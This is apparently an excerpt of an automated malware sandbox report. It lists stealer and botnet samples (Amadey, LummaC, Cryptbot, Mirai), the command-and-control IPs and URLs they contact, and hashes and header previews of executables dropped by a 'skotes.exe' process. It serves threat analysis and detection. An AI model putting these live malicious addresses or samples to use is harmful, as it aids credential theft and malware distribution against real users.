                                                                                                                                                                                                                            185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            R2CgZG545D.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            UyiH4t5dph.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                            • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                            185.121.15.192file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • fivetk5ht.top/v1/upload.php
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.thirtgt13pt.top/xXjBuasiAlUtxjHhtPcq1734624688
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.tentk10pt.top/HfKLHljvcctMDHZDaAmV1734701446
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.twentytk20pt.top/ORoWtRYgVgDaQibUWeOu1734624689
                                                                                                                                                                                                                            t3VyxF5MmA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                                                                                                                                                                                                            Pm81aa8zii.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                                                                                                                                                                                                            avBx6p1FAX.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                                                                                                                                                                                                            j6Nv9kUydV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                                                                                                                                                                                                            28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                                                                                                                                                                                                            HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                                                                                                                                            • 185.215.113.43
                                                                                                                                                                                                                            hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 185.215.113.206
                                                                                                                                                                                                                            Qmg24kMXxU.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            • 185.215.113.16
                                                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSla.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 20.107.184.106
                                                                                                                                                                                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 20.35.139.90
                                                                                                                                                                                                                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 21.227.49.55
                                                                                                                                                                                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 20.217.9.254
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 20.233.83.145
                                                                                                                                                                                                                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 52.167.54.21
                                                                                                                                                                                                                            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 52.189.251.147
                                                                                                                                                                                                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 22.35.189.114
                                                                                                                                                                                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 40.107.195.177
                                                                                                                                                                                                                            nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 21.10.182.152
                                                                                                                                                                                                                            REDSERVICIOESfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            t3VyxF5MmA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            Pm81aa8zii.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            avBx6p1FAX.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            j6Nv9kUydV.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 185.121.15.192
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exefile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                Entropy (8bit):0.867294700276359
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:oW+MY8Do6PsnoXAMG0f6QXIDcQMc6tcEKcw3E+HbHg/8BRTf3Oy1oVazW0IbntuY:8Jao6P/0CpwRjuJMzuiFUZ24lO8cS
                                                                                                                                                                                                                                                MD5:6B48B41D460668595FF4705E66DCF3F6
                                                                                                                                                                                                                                                SHA1:58BBD7CF1F6F2EF0DCE9941C441068CD430ABD9E
                                                                                                                                                                                                                                                SHA-256:6725F8C507212765AF9EDD88DDD1759D89B333DFD92D047142C511A84F32E536
                                                                                                                                                                                                                                                SHA-512:D942923AEBF71873DA6E840CF02C1EA48954B8172987970DFA0DF2741555D296851161856BB086EA49A5EBB76DA0FFD6410EDC258B470C8C01EE6ABBD8DB4A64
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.2.0.6.4.4.7.5.6.0.4.3.6.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.2.0.6.4.4.9.0.6.0.4.3.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.a.5.8.5.a.5.-.2.e.b.b.-.4.6.8.9.-.9.d.c.6.-.2.6.a.5.6.1.b.d.4.b.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.5.6.e.7.0.2.-.d.9.a.e.-.4.1.3.1.-.9.5.8.5.-.2.0.b.d.1.9.7.c.9.e.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.2.g.w.m.t.Z.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.d.i.s.k.u.s.a.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.8.-.0.0.0.1.-.0.0.1.5.-.8.6.b.5.-.0.5.5.d.2.c.5.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.a.f.6.7.9.5.e.e.b.e.8.9.0.9.4.a.1.0.4.1.0.4.8.9.8.f.d.4.9.6.b.0.0.0.0.0.9.0.4.!.0.0.0.0.4.1.6.3.5.3.3.2.c.4.8.2.2.3.c.c.e.1.0.3.c.5.2.5.c.d.2.0.d.e.2.f.7.b.4.0.6.e.c.1.!.2.g.w.m.t.Z.s...e.x.e...
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 22:14:07 2024, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):35248
                                                                                                                                                                                                                                                Entropy (8bit):2.200750618951469
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:5TWSBJFC+eX2SOzhrJDy1v5Rx6gUJW4AWUj4S+DN:ZzBJU+I2tz5JIvnIZg4SGN
                                                                                                                                                                                                                                                MD5:383D5318E5FE010A579DCDA4AE542898
                                                                                                                                                                                                                                                SHA1:25123B31501CF71C429D0797CE090161873EBA44
                                                                                                                                                                                                                                                SHA-256:CC41FB84ED458B967893B7E68B4BE9B2B8F417173BC66F0349007FF0E36FB736
                                                                                                                                                                                                                                                SHA-512:5AA4620C3EEA367E35688A14B227DC3540D3AD08C0BD0CDFFE238C83691B7B3B1FF7E77244C9F9688B6467F093B6AB2F3BDA007EBA408D2D6A27A01903D2B98F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MDMP..a..... ......./.eg............4...............<.......T...D%..........T.......8...........T...........8...xk..........,...........................................................................................eJ..............Lw......................T.......X.....eg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10168
                                                                                                                                                                                                                                                Entropy (8bit):3.709415442484177
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJ8RCVN6YDr6IgmfNK6WpDH89bpbNzfejjm:R6lXJKC/6Yv6IgmfNK6zpbZfa6
                                                                                                                                                                                                                                                MD5:11EEC2BCCBBA8514D024EDBEBBE35D00
                                                                                                                                                                                                                                                SHA1:2BA1671EC3D7F05D7FE37D58F000429980FE23CE
                                                                                                                                                                                                                                                SHA-256:365053A0F8FBA30946C41CADCDDA5D8681836DBC2E795CDFA0F27C5B2C497357
                                                                                                                                                                                                                                                SHA-512:DDB2807F4B034B15A35DBF4F2F6A1C531B85578E386AFFAF2F6566A976FA644AB225BFD70ABFB7A0C28371B13AA1DB36718C95E283F6F30FFDE8EA73BA2BF006
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.8.<./.P.i.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4721
                                                                                                                                                                                                                                                Entropy (8bit):4.453419111500037
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsgJg771I9KtWpW8VYw3PYm8M4Jun1VSWUFvDyq85CXm6Wir8NYSzk/SF:uIjfmI7Rc7VVSJpZSo8Njzk6Pd
                                                                                                                                                                                                                                                MD5:68475B5336406BE2A5F2FCB8D839D78B
                                                                                                                                                                                                                                                SHA1:B46B703862FBCEB823B66BD06346E1AB49AEAE2E
                                                                                                                                                                                                                                                SHA-256:3AB8B1FF91425635BD414E575E7C40C89F62DCEDFF58FBD86966AD4369AEE37D
                                                                                                                                                                                                                                                SHA-512:B127269238F17163CE9E3490D8A72DF10996D79BECF7EF9CC2CE0769DAA10D554478ABC5E0EA61633BA92FA4D61A189DC07D4A7A588CC5331DA994A83883E6A8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="640156" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4438776
                                                                                                                                                                                                                                                Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                                MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                                SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                                SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1374720
                                                                                                                                                                                                                                                Entropy (8bit):7.0671827674657335
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:fYlZH+uQDPYLZtPikfLyXFD3qRc4f6GO4k88P9VB77Ml8fmMxHr:fYu7DPYLZtakzyVD3ELCh//+8fmW
                                                                                                                                                                                                                                                MD5:669ED3665495A4A52029FF680EC8EBA9
                                                                                                                                                                                                                                                SHA1:7785E285365A141E307931CA4C4EF00B7ECC8986
                                                                                                                                                                                                                                                SHA-256:2D2D405409B128EEA72A496CCFF0ED56F9ED87EE2564AE4815B4B116D4FB74D6
                                                                                                                                                                                                                                                SHA-512:BEDC8F7C1894FC64CDD00EBC58B434B7D931E52C198A0FA55F16F4E3D44A7DC4643EAA78EC55A43CC360571345CD71D91A64037A135663E72EED334FE77A21E6
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h.D..........&....&..........................@..........................p......\U....@... ..............................P..........,l.......................c...................................................T...............................text...............................`..`.data...H...........................@....rdata..............................@..@.eh_fram............p..............@..@.bss....4....@...........................idata.......P......................@....CRT....8....p.......$..............@....tls.................&..............@....rsrc...,l.......n...(..............@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4425728
                                                                                                                                                                                                                                                Entropy (8bit):7.986049234740422
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:IsU3t5SLbByTqc4sEew5/7eXoqRXrIFRgAneqXmYGsCZ+UWz463/:IZ3abwTZ4cuD5cXUFbneJsLUWLP
                                                                                                                                                                                                                                                MD5:6087D5A01774D89431F633D9B2D1D705
                                                                                                                                                                                                                                                SHA1:5C3B075E194FA131FDFFDAB37FFB4936DB50A0D7
                                                                                                                                                                                                                                                SHA-256:51121D1B988327E1845BE7351022F85370A19154989ED3079CF7C202F45A428F
                                                                                                                                                                                                                                                SHA-512:4ACC1431638AD5B1B66137EC1A253EF2EEC1655F111FD7EDD22692D7E5EDADEF61DD40ED69180D13B7627822DA827E3CDECE77D7F868F72E6E0FA28A38B34A91
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................-yD...@... ............................._.r.s.....r.....................................................0....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..7...r......H(.............@...lvbdatvl. ...........J(.............@...bclfnnmn.............bC.............@....taggant.0......."...fC.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2850816
                                                                                                                                                                                                                                                Entropy (8bit):6.502732547592341
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:Zr0XExBbCGSc7EH3/hcDz7rZ36N+KFGJf4:50XExRfp7EH3/hqVKFF
                                                                                                                                                                                                                                                MD5:101F06101CEB14FAE553D98292FAA442
                                                                                                                                                                                                                                                SHA1:DFADEF7FA9BB9EC8B82F65F63BED085798FECAD3
                                                                                                                                                                                                                                                SHA-256:9ACC4A0EA469E6A6F1C944263024167BE02390916D49670C358604E0B17B0CB6
                                                                                                                                                                                                                                                SHA-512:A3B905AE3132234E027DFD416A1714778E757A82A7AE8ADDC7A0D334781E57ADEB5044F7537F2B51452E4AB6D7FC82C410178F5A552BC2E4D3DD776433A9C9CF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................N.....*.+...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ahfdhchk..)...$...)..|..............@...qmoqclyl......N......X+.............@....taggant.0....N.."...^+.............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):968192
